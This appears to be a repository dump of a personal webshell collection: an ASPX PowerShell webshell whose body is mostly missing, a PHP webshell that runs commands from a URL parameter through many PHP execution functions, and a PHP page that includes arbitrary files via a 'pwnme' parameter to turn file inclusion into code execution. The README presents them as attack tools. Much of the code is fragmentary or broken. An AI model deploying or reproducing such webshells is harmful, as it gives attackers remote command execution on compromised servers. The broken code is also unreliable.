├── POWERshell.aspx ├── RCEfinder.php ├── README.md └── rfi2lfi.php /POWERshell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" %> 2 | <%@ Import Namespace="System.Collections.ObjectModel"%> 3 | <%@ Import Namespace="System.Management.Automation"%> 4 | <%@ Import Namespace="System.Management.Automation.Runspaces"%> 5 | <%@ Assembly Name="System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31BF3856AD364E35"%> 6 | 7 | 8 | 9 | 47 | 48 | 49 | 50 | POWER!shelled 51 | 52 | 53 |
54 | Index 55 | POWER!webshell>
56 | 59 |
60 | 62 |
63 | 64 | 65 | -------------------------------------------------------------------------------- /RCEfinder.php: -------------------------------------------------------------------------------- 1 | '; 4 | echo ''; 5 | echo ''; 6 | echo ''; 7 | 8 | //heading 9 | echo '
'; 10 | echo '

ThePacketBender PHP Webshell

'; 11 | echo '

testing php command execution

'; 12 | echo '
'. php_uname(); 13 | echo '
'; 14 | 15 | 16 | //inputs(GET) 17 | $iget = <<<'IGET' 18 |
19 |
20 |
21 |
22 |
43 | run as process? 44 | 45 |
46 |
47 |
'; 48 | 49 | echo $iget; 50 | ugot($optvals); 51 | echo $igot; 52 | 53 | 54 | //print status 55 | foreach ($pro as $x) { 56 | $x.dispProc(); 57 | } 58 | 59 | 60 | //classes for custom rce stdio 61 | class Process{ 62 | private $pid; 63 | private $cmd; 64 | 65 | //execute command to ignore signals 66 | private function runCmd(){ 67 | if (substr(php_uname(), 0, 7) == "Windows"){ 68 | $cmd = 'START /B /min '.$this->cmd; 69 | } 70 | else{ 71 | $cmd = 'nohup '.$this->cmd.' 2>/dev/null 2>&1 & echo $!'; 72 | //exec($cmd, $output, $rl); 73 | $this->pid = (int)$op[0]; 74 | } 75 | } 76 | //set process ID 77 | public function sPid($pid){ 78 | $this->pid = $pid; 79 | } 80 | //get process ID 81 | public function gPid(){ 82 | return $this->pid; 83 | } 84 | //check status if command execution is non-blind 85 | public function ps(){ 86 | //define command command for given OS 87 | if (substr(php_uname(), 0, 7) == "Windows"){ 88 | $this->cmd = 'tasklist | FINDSTR '.$this->pid; 89 | } 90 | else { 91 | $this->cmd = 'ps -aux | grep '.$this->pid; 92 | } 93 | //exec($command,$op); 94 | if (!isset($op[1]))return false; 95 | else return true; 96 | } 97 | public function start(){ 98 | if ($this->cmd . $this->cmd != ''){ 99 | $this->runCom(); 100 | } 101 | else{ 102 | return true; 103 | } 104 | } 105 | public function stop(){ 106 | gPid(); 107 | $this->cmd = 'kill '. $this->pid; 108 | //exec($command,$op); 109 | if ($this->status() == false){ 110 | return true; 111 | } 112 | else { 113 | return false; 114 | } 115 | } 116 | public function dispProc(){ 117 | echo $this->pid .' '. $this->cmd .''; 118 | } 119 | } 120 | 121 | 122 | //functions for custom rce stdio 123 | function execBackground($cmd) { 124 | if (substr(php_uname(), 0, 7) == "Windows"){ 125 | pclose(popen("start /B ". $cmd, "r")); 126 | } 127 | else { 128 | exec($cmd . " > /dev/null &"); 129 | } 130 | } 131 | $i = 0; 132 | $pro = array(); 133 | function proc($cmd) { 134 | $i++; 135 | $i = new Process(); 136 | $i->cmd = $cmd; 137 | $i.start(); 138 | $pro[] = &$i; 139 | 140 | return $cmd; 141 | } 142 | 143 | //standard output 144 | function stdout($cmd) { 145 | //check for value 146 | if ($_GET["cmd"] != NULL){ 147 | $cmd = $_GET["cmd"]; 148 | } 149 | //instantiate as Process if true 150 | if ($_GET["isProcess"] == True){ 151 | //DO WORK HERE 152 | //THIS IS WHERE class object returns code for jobbing 153 | //e.g. cmd = ProcessName->cmd . $_GET($cmd); 154 | $prefix = proc($cmd); 155 | $prefix .= $cmd; 156 | $cmd = prefix; 157 | } 158 | echo '

'; 159 | switch ($_GET["function"]) { 160 | case backticks: 161 | echo `$cmd`; 162 | case exe: 163 | exec($cmd,$output,$rv); 164 | print "return value " . $rv; 165 | print "----------------------"; 166 | print "--------output--------"; 167 | print "----------------------"; 168 | echo '
'; 169 | print $output; 170 | //made redundant? 171 | case exebg: 172 | execBackground($cmd); 173 | case pcntlexe: 174 | $args = preg_split('/ /', $_GET[cmd], 1, PREG_SPLIT_OFFSET_CAPTURE); 175 | echo pcntl_exec($cmd[0],$args); 176 | case popn: 177 | $rets = popen($cmd, 'r'); 178 | $read = fread($rets, 4096); 179 | echo $read; 180 | case procopen: 181 | $descriptor = array( 182 | 0 => array("pipe", "r"), //stdin 183 | 1 => array("pipe", "w"), //stdout 184 | 2 => array("file", "/dev/null", "a") //stderr 185 | ); 186 | echo proc_open($cmd, $descriptor); 187 | case pthru: 188 | $rets = ""; 189 | passthru($cmd, $rets); 190 | print $rets; 191 | case sexec: 192 | echo shell_exec($_GET["cmd"]); 193 | case sys: 194 | $rets = ""; 195 | system($cmd, $rets); 196 | print $rets; 197 | default: 198 | 199 | 200 | } 201 | echo '
'; 202 | } 203 | print(stdout()); 204 | echo '
'; 205 | if ($_GET[$pinfo]=pinfo) { 206 | echo phpinfo(); 207 | } 208 | echo ''; 209 | echo ''; 210 | 211 | ?> 212 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WEBSHELLS 2 | 3 | Webshells I have written: 4 | ------------------------- 5 | _________________________ 6 | POWERshell.aspx 7 | -basic powershell RFI webshell, some code taken from sources then trimmed, pruned, reconfigured and parts reconnected to alter execution flow in client browser 8 | RCEfinder.php 9 | -Webshell for fuzzing system command execution using builtin and custom php functions to bypass limiting php configurations with optional job control 10 | -implemented in code, will be added to UI- for debugging code execution errors 11 | RFI2LFI.php 12 | -Local file inclusion vulnerable php file implenting known attack methods to fuzz for arbitrary code execution where RCE command execution methods have failed -------------------------------------------------------------------------------- /rfi2lfi.php: -------------------------------------------------------------------------------- 1 | '; 4 | echo ''; 5 | echo ''; 6 | echo ''; 7 | 8 | //heading 9 | echo '
'; 10 | echo '

ThePacketBender PHP Webshell

'; 11 | echo '

for exploiting LFI for shell over RFI

'; 12 | echo '
'. php_uname(); 13 | echo '
'; 14 | 15 | 16 | //inputs(GET) 17 | $iget = <<<'IGET' 18 |
19 |
20 |
21 |
22 |
42 | 43 |
44 |
45 |
'; 46 | 47 | echo $iget; 48 | ugot($optvals); 49 | echo $igot; 50 | 51 | 52 | //function 53 | function geturl($url, $referer) { 54 | $headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg,text/html,application/xhtml+xml'; 55 | $headers[] = 'Connection: Keep-Alive'; 56 | $headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; 57 | $useragent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)'; 58 | 59 | $process = curl_init($url); 60 | curl_setopt($process, CURLOPT_HTTPHEADER, $headers); 61 | curl_setopt($process, CURLOPT_HEADER, 0); 62 | curl_setopt($process, CURLOPT_USERAGENT, $useragent); 63 | curl_setopt($process, CURLOPT_REFERER, $referer); 64 | curl_setopt($process, CURLOPT_TIMEOUT, 30); 65 | curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); 66 | curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1); 67 | 68 | $ret = curl_exec($process); 69 | curl_close($process); 70 | 71 | return $ret; 72 | } 73 | 74 | 75 | //standard output 76 | echo '
'; 77 | function stdout($cmd) { 78 | //check for value 79 | if ($_GET["cmd"] != NULL){ 80 | $cmd = $_GET["cmd"]; 81 | echo ''; 82 | } 83 | echo '

'; 84 | switch ($_GET["function"]) { 85 | case "environ": 86 | echo ''; 87 | case "fd": 88 | echo ''; 89 | echo ''; 90 | $fd = array("cmdline","stat","status"); 91 | for($x=0;$x=33;$x++){ 92 | array_push($fd, $x); 93 | } 94 | $link = 'http://'. $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; 95 | foreach($fd as $fil){ 96 | echo ''; 97 | echo geturl($link, $link); 98 | } 99 | case "data": 100 | //stop onload and close GET form 101 | echo ''; 102 | echo ''; 103 | echo ''; 104 | 105 | //POST request form 106 | echo '
'; 107 | echo ''; 108 | echo '
'; 109 | 110 | //XMLHttpRequest hack to asynchronously submit GET data:// and POST $cmd 111 | echo 'var f = document.forms.rfi; 112 | var pDat = []; 113 | for (var i = 0; i < f.elements.length; i++) { 114 | pDat.push(f.elements[i].name + "=" + f.elements[i].value); 115 | } 116 | var xhr = new XMLHttpRequest(); 117 | xhr.open("POST", "'. $_SERVER['PHP_SELF'] .'", true); 118 | xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 119 | xhr.send(postData.join("&")); 120 | document.forms.lfi.submit();'; 121 | case "expect": 122 | echo ''; 123 | case "input": 124 | //stop onload and close GET form 125 | echo ''; 126 | echo ''; 127 | echo ''; 128 | 129 | //POST request form 130 | echo '
'; 131 | echo ''; 132 | echo '
'; 133 | 134 | //XMLHttpRequest hack to asynchronously submit GET data:// and POST $cmd 135 | echo 'var f = document.forms.rfi; 136 | var pDat = []; 137 | for (var i = 0; i < f.elements.length; i++) { 138 | pDat.push(f.elements[i].name + "=" + f.elements[i].value); 139 | } 140 | var xhr = new XMLHttpRequest(); 141 | xhr.open("POST", "'. $_SERVER['PHP_SELF'] .'", true); 142 | xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 143 | xhr.send(postData.join("&")); 144 | document.forms.lfi.submit();'; 145 | 146 | case "filter": 147 | echo ''; 148 | case "log": 149 | 150 | case "phpinfo": 151 | phpinfo(); 152 | default: 153 | echo 'NO LFI $_GET[] ?PARAMETER=PASSED, ergo FUNCTION include() returned NULL'; 154 | } 155 | } 156 | echo ''; 157 | print(include($_GET['pwnme'])); 158 | #print(stdout()); 159 | echo '
'; 160 | echo ''; 161 | echo ''; 162 | 163 | ?> 164 | --------------------------------------------------------------------------------